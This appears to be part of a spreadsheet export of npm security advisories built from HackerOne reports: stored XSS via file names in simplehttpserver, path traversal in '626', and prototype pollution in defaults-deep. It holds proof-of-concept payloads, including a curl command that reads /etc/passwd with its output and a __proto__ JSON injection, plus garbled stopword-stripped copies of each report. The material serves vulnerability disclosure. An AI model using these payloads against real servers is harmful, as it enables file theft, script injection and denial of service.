Rafal "bl4de" Janicki  Impact  vulnerability used read content file remote server hekto run. </t>
  </si>
  <si>
    <t>vulnerability used read content file remote server hekto run.</t>
  </si>
  <si>
    <t>[simplehttpserver] Stored XSS in file names leads to malicious JavaScript code execution when directory listing is output in HTML</t>
  </si>
  <si>
    <t>/advisories/585</t>
  </si>
  <si>
    <t>2018-04-24T22:31:39.363+00:00</t>
  </si>
  <si>
    <t>simplehttpserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/simplehttpserver</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/309648.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;simplehttpserver&lt;/strong&gt; allows to embed HTML in file names, which (in certain conditions) might lead to execute malicious JavaScript.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&amp;#39;simpehttpserver&amp;#39; is simple imitiation of python&amp;#39;s SimpleHTTPServer and intended for testing, development and debugging purposes&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/simpehttpserver" href="/redirect?signature=c029c8aa12084dc772b4da4e7c92c3fca48b6fc8&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fsimpehttpserver" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/simpehttpserver&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This issue is another example of lack of output sanitization. &lt;br&gt;
Here&amp;#39;s source code, which allows to embed HTML in file name and run attack presented in PoC section (./node_modules/simplehttpserver/simplehttpserver.js, lines 106-117):&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;
    &lt;span class="c1"&gt;// Check for each file if it&amp;#39;s a directory or a file&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;q&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;async&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;queue&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;cb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;stat&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nx"&gt;cb&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
           &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nx"&gt;stat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isDirectory&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="nx"&gt;ulist&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
               &lt;span class="nx"&gt;ulist&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;li&amp;gt;&amp;lt;a href=&amp;quot;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;quot;&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;item&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
           &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="nx"&gt;cb&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, &lt;code&gt;item&lt;/code&gt; is output directly into HTML without any sanitization.&lt;/p&gt;
&lt;h2 id="poc-steps-to-reproduce"&gt;PoC - Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;In the directory which will be served via &lt;code&gt;simple-server&lt;/code&gt;, create file with following name:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;javascript:alert(&amp;#39;You are pwned!&amp;#39;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Run &lt;code&gt;simplehttpserver&lt;/code&gt; in directory with file with changed filename:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/simplehttpserver/cli.js
Listening 0.0.0.0:8000 web root dir /Users/bl4de/playground/node_bugbounty_playground
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and open &lt;code&gt;http://127.0.0.1:8000&lt;/code&gt; in the browser.&lt;/p&gt;
&lt;p&gt;Try to open file with name &lt;code&gt;javascript:alert(&amp;#39;You are pwned!&amp;#39;)&lt;/code&gt; by clicking it.&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/774/765865c330ab81a7d1795a9e9b3713633c653a79/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJHH6RMOAD4EIQLKQ%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIhFjlYcf4BS4hLpCK3A%2BOieWNn%2FyqEj9RRI8diizuantyyunusgwllWuuENEG1mgik5l3yg0s2yTYNl4sMAkRtdZKdRI9RATO4rMjHN1sU8W2NGKIoSgqbt%2FAia%2Brr0d7noQ44WuksMBn%2BSIpiewjwGTGz3ksetERrgJi25nMlpX%2Bz%2F0bzXh9LgiP265BcOIDEVw680KDGgtox%2B2uQUvEDlQmQlDb5ib1s83eztve%2Brh%2Fm00D%2F7ywjgmyHTRSdBgdbTa8N8mmDO7Tqv4KO2S5HJhJrk9rQJr3sQzDbjnNacI47FQ72gIl7p5Nbiv0xJ8lObxNXq1130VO07Iawm3HWae769c3bmlK4IfdIwEgympUL%2Bavv3pyiiNsdyQBsSJZGWbX5XD4F1g3X1xlwbPEa3a4KD0zlgOe2ZkzazrhO2B6Wjv%2FDk3SbnkQ7QHtGGEmRO8gOuQPqF7tWdzaYo%2B6EFw6Pm12z70UFOW59jpBa5FirKyzAIb2XpFP6WbOrnhzqiZ7yXI0NuWqzSaGgGVjFkShqMXCODuZ0rUC9ncGz9fk9seS%2FEy4D4%2FrT1uUkpuzIOykXiD3qFgTe%2FqBVLjwx9DJNz74og8Hs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9cbedadfcedcc2497fc11402b7d7f3e3b7fa817aa4b2da02b56f3311d8386572" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/774/765865c330ab81a7d1795a9e9b3713633c653a79/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAJHH6RMOAD4EIQLKQ%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFgaDIIhFjlYcf4BS4hLpCK3A%2BOieWNn%2FyqEj9RRI8diizuantyyunusgwllWuuENEG1mgik5l3yg0s2yTYNl4sMAkRtdZKdRI9RATO4rMjHN1sU8W2NGKIoSgqbt%2FAia%2Brr0d7noQ44WuksMBn%2BSIpiewjwGTGz3ksetERrgJi25nMlpX%2Bz%2F0bzXh9LgiP265BcOIDEVw680KDGgtox%2B2uQUvEDlQmQlDb5ib1s83eztve%2Brh%2Fm00D%2F7ywjgmyHTRSdBgdbTa8N8mmDO7Tqv4KO2S5HJhJrk9rQJr3sQzDbjnNacI47FQ72gIl7p5Nbiv0xJ8lObxNXq1130VO07Iawm3HWae769c3bmlK4IfdIwEgympUL%2Bavv3pyiiNsdyQBsSJZGWbX5XD4F1g3X1xlwbPEa3a4KD0zlgOe2ZkzazrhO2B6Wjv%2FDk3SbnkQ7QHtGGEmRO8gOuQPqF7tWdzaYo%2B6EFw6Pm12z70UFOW59jpBa5FirKyzAIb2XpFP6WbOrnhzqiZ7yXI0NuWqzSaGgGVjFkShqMXCODuZ0rUC9ncGz9fk9seS%2FEy4D4%2FrT1uUkpuzIOykXiD3qFgTe%2FqBVLjwx9DJNz74og8Hs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9cbedadfcedcc2497fc11402b7d7f3e3b7fa817aa4b2da02b56f3311d8386572" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="wrap-up"&gt;Wrap up&lt;/h2&gt;
&lt;p&gt;I hope this report will help to keep Node ecosystem more safe. If you have any questions about any details of this finding, please let me know in comment.&lt;/p&gt;
&lt;p&gt;Thank you&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact:&lt;/h2&gt;
&lt;p&gt;This vulnerability can be used to eg. download malware via &amp;quot;drive-by-download&amp;quot; attacks. Also, as described in other modules I&amp;#39;ve reported similar vulnerabilty, an iframe with malicious JS file loaded from external resource can be executed.&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability can be used to eg. download malware via &amp;quot;drive-by-download&amp;quot; attacks. Also, as described in other modules where I&amp;#39;ve reported similar vulnerabilty, an iframe with malicious JS file loaded from external resource can be executed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-26T22:06:10.553Z</t>
  </si>
  <si>
    <t>2018-02-26T21:44:29.711Z</t>
  </si>
  <si>
    <t>This vulnerability can be used to eg. download malware via "drive-by-download" attacks. Also, as described in other modules I've reported similar vulnerabilty, an iframe with malicious JS file loaded from external resource can be executed.This vulnerability can be used to eg. download malware via "drive-by-download" attacks. Also, as described in other modules where I've reported similar vulnerabilty, an iframe with malicious JS file loaded from external resource can be executed.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  simplehttpserver allows embed HTML file names, (in certain conditions) lead execute malicious JavaScript.  Module    "simpehttpserver" simple imitiation python"s SimpleHTTPServer intended testing, development debugging purposes  https //www.npmjs.com/package/simpehttpserver  Description  issue example lack output sanitization.  Here"s source code, allows embed HTML file name run attack presented PoC section (./node_modules/simplehttpserver/simplehttpserver.js, lines 106 117)       // Check file it"s directory file     var q = async.queue(function(item, cb) {         fs.stat(path.join(pathname, item), function(err, stat) {            (  stat ) cb();            ( stat.isDirectory() ) {                ulist.push(""+item+"/")            } else {                ulist.push(""+item+"")            }             cb();         });     }, 4);  see, item output directly HTML without sanitization.  PoC   Steps Reproduce   directory will served via simple server, create file following name  javascript alert("You pwned ")  Run simplehttpserver directory file changed filename  $ ./node_modules/simplehttpserver/cli.js Listening 8000 web root dir /Users/bl4de/playground/node_bugbounty_playground  open http //127.0.0.1 8000 browser.  Try open file name javascript alert("You pwned ") clicking it.    Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.3 node 8.9.3 npm 5.5.1 curl 7.54.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact   vulnerability used eg. download malware via Â« Â»drive downloadÂ« Â» attacks. Also, described modules I"ve reported similar vulnerabilty, iframe malicious JS file loaded external resource executed.  Impact  vulnerability used eg. download malware via Â« Â»drive downloadÂ« Â» attacks. Also, described modules I"ve reported similar vulnerabilty, iframe malicious JS file loaded external resource executed. </t>
  </si>
  <si>
    <t>vulnerability used eg. download malware via "drive-by-download" attacks. Also, described modules I've reported similar vulnerabilty, iframe malicious JS file loaded external resource vulnerability used eg. download malware via "drive-by-download" attacks. Also, described modules I've reported similar vulnerabilty, iframe malicious JS file loaded external resource executed.</t>
  </si>
  <si>
    <t>/advisories/584</t>
  </si>
  <si>
    <t>2018-04-24T21:49:57.862+00:00</t>
  </si>
  <si>
    <t>anywhere</t>
  </si>
  <si>
    <t>https://www.npmjs.com/anywhere</t>
  </si>
  <si>
    <t>&lt;1.5.0</t>
  </si>
  <si>
    <t>&gt;=1.5.0</t>
  </si>
  <si>
    <t>[626] Path Traversal allows to read arbitrary file from remote server</t>
  </si>
  <si>
    <t>/advisories/583</t>
  </si>
  <si>
    <t>2018-04-24T21:46:59.857+00:00</t>
  </si>
  <si>
    <t>https://www.npmjs.com/626</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/311216.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;There is Path Traversal vulnerability in 626 module, which allows to read arbitrary file from the remote server.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;626&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This package exposes a directory and its children to create, read, update, and delete operations over http.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/626" href="/redirect?signature=e4e782d23bde5f36f41411381cf8a1f9104d36d0&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2F626" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/626&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;version: 1.1.1&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
0 downloads in the last day&lt;br&gt;
19 downloads in the last week&lt;br&gt;
103 downloads in the last month&lt;/p&gt;
&lt;p&gt;~1200 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;This vulnerability exists, because there is no sanitization of path of requested file:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/626/index.js, line 15:&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;resolveUrl&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;resolve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;: &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;utf8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;error: file not found &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;626&lt;/code&gt; module&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install 626
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run server from command line:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/626/index.js
Listening on 8080
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;use following command to confirm the vulnerability (pelase adjust number of ../ to reflect your system):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8080/../../../../etc/passwd
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8080/../../../../etc/passwd
*   Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8080 (#0)
&amp;gt; GET /../../../../../etc/passwd HTTP/1.1
&amp;gt; Host: 192.168.1.1:8080
&amp;gt; User-Agent: curl/7.54.0
&amp;gt; Accept: */*
&amp;gt;
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Date: Wed, 31 Jan 2018 22:51:06 GMT
&amp;lt; Connection: keep-alive
&amp;lt; Content-Length: 6774
&amp;lt;
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
(...)
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS 10.13.3&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3331.0 (Developer Build) (64-bit) &lt;/li&gt;
&lt;li&gt;Node.js version: v8.9.3&lt;/li&gt;
&lt;li&gt;npm version: 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please feel free to invite module maintainer to this report. I haven&amp;#39;t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.&lt;/p&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe in the future.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability allows to read content of any file on the remote server where 626 is run.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-31T23:06:35.622Z</t>
  </si>
  <si>
    <t>2018-02-26T21:30:35.015Z</t>
  </si>
  <si>
    <t>This vulnerability allows to read content of any file on the remote server where 626 is run.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  Path Traversal vulnerability 626 module, allows read arbitrary file remote server.  Module  626  package exposes directory its children create, read, update, delete operations http.  https //www.npmjs.com/package/626  version  1.1.1  Stats 0 downloads last day 19 downloads last week 103 downloads last month  ~1200 estimated downloads per year  Description  vulnerability exists, no sanitization path requested file  // node_modules/626/index.js, line 15       var url = resolveUrl(req.url);     var file = path.resolve(url);     log(url + "  " + file);      fs.readFile(file, "utf8", function (err, content) {         (err) {             return res.end("error  file not found " + file);         }   Steps Reproduce    install 626 module  $ npm install 626   run server command line   $ ./node_modules/626/index.js Listening 8080   use following command confirm vulnerability (pelase adjust number ../ reflect system)   $ curl  v   path http //127.0.0.1 8080/../../../../etc/passwd  Result  $ curl  v   path http //127.0.0.1 8080/../../../../etc/passwd *   Trying 192.168.1.1... * TCP_NODELAY set * Connected (192.168.1.1) port 8080 (#0)   /../../../../../etc/passwd HTTP/1.1   Host  8080   User Agent  curl/7.54.0   Accept  */*   &lt; HTTP/1.1 200 OK &lt; Date  Wed, 31 Jan 2018 22 51 06 GMT &lt; Connection  keep alive &lt; Content Length  6774 &lt; ## # User Database # # Note file consulted directly when system running # single user mode.  times information provided # Open Directory. # # opendirectoryd(8) man page additional information # Open Directory. ## nobody *  2  2 Unprivileged User /var/empty /usr/bin/false root * 0 0 System Administrator /var/root /bin/sh (...)  Supporting Material/References   Configuration    macOS 10.13.3 Chromium 66.0.3331.0 (Developer Build) (64 bit)  version  v8.9.3 npm version  5.5.1 curl 7.54.0   Please feel free invite module maintainer report. haven"t contacted maintainer want keep process fixing disclosing bug consistent HackerOne platform only.  hope report will help keep ecosystem its users safe future.  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability allows read content file remote server 626 run. </t>
  </si>
  <si>
    <t>vulnerability allows read content file remote server 626 run.</t>
  </si>
  <si>
    <t>/advisories/582</t>
  </si>
  <si>
    <t>2018-04-24T21:43:52.55+00:00</t>
  </si>
  <si>
    <t>&lt;1.0.2</t>
  </si>
  <si>
    <t>&gt;=1.0.2</t>
  </si>
  <si>
    <t>Prototype pollution attack (defaults-deep)</t>
  </si>
  <si>
    <t>/advisories/581</t>
  </si>
  <si>
    <t>2018-04-24T21:37:11.326+00:00</t>
  </si>
  <si>
    <t>default-deep</t>
  </si>
  <si>
    <t>https://www.npmjs.com/default-deep</t>
  </si>
  <si>
    <t>&lt;0.2.4</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/310514.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As discussed in &lt;a href="/reports/309391"&gt;#309391&lt;/a&gt;, here&amp;#39;s the separate report for each of the library. This one is the information for the defaults-deep library.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;[&lt;a title="https://www.npmjs.com/package/defaults-deep%5D(defaults-deep)" href="/redirect?signature=ea726f0ebaa25b140440d9d0b5c39c93a8821eb1&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fdefaults-deep%255D%28defaults-deep%29" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/defaults-deep%5D(defaults-deep)&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilities function in all the listed modules can be tricked into modifying the prototype of &amp;quot;Object&amp;quot; when the attacker control part of the structure passed to these function. This can let an attacker add or modify existing property that will exist on all object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;p&gt;The simplest test case to reproduce the issue is the following code snippet. In the code snippet, &amp;quot;malicious_payload&amp;quot; would come from an endpoint which accepts JSON data. &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;var defaults-deep = require(&amp;#39;defaults-deep&amp;#39;);&lt;br&gt;
var malicious_payload = &amp;#39;{&amp;quot;__proto__&amp;quot;:{&amp;quot;oops&amp;quot;:&amp;quot;It works !&amp;quot;}}&amp;#39;;&lt;/p&gt;
&lt;p&gt;var a = {};&lt;br&gt;
console.log(&amp;quot;Before : &amp;quot; + a.oops);&lt;br&gt;
defaults-deep({},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guaranteed, but more significant impact like remote code execution can be achieved in some cases.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-30T15:14:22.664Z</t>
  </si>
  <si>
    <t>2018-02-15T19:26:35.249Z</t>
  </si>
  <si>
    <t>This vulnerability is garanteed to at least obtain denial of service as all the library allow the property "toString" and "valueOf" to be replaced by a "String". This breaks the express module and forces the server to either crash or return a 500 to every subsequent request.Variable. Server crash or the server becoming unable to respond to all request is guaranteed, but more significant impact like remote code execution can be achieved in some cases.</t>
  </si>
  <si>
    <t xml:space="preserve">discussed #309391, here"s separate report library. one information defaults deep library.  Module   [https //www.npmjs.com/package/defaults deep%5D(defaults deep)  Summary   Utilities function listed modules tricked modifying prototype Â« Â»ObjectÂ« Â» when attacker control part structure passed function. let attacker add modify existing property will exist object.  Description   Steps Reproduce   simplest test case reproduce issue following code snippet. code snippet, Â« Â»malicious_payloadÂ« Â» endpoint accepts JSON data.    var defaults deep = require("defaults deep"); var malicious_payload = "{Â« Â»__proto__Â« Â» {Â« Â»oopsÂ« Â» Â« Â»It works  Â« Â»}}";  var = {}; console.log(Â« Â»Before   Â« Â» + a.oops); defaults deep({}, JSON.parse(malicious_payload)); console.log(Â« Â»After   Â« Â» + a.oops);   shows attacker add attributes existing object server. Additional attribute used change execution code flow cause error every subsequent request replacing Â« Â»toStringÂ« Â» Â« Â»valueOfÂ« Â».  Impact  vulnerability garanteed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guaranteed, significant impact remote code execution achieved cases. </t>
  </si>
  <si>
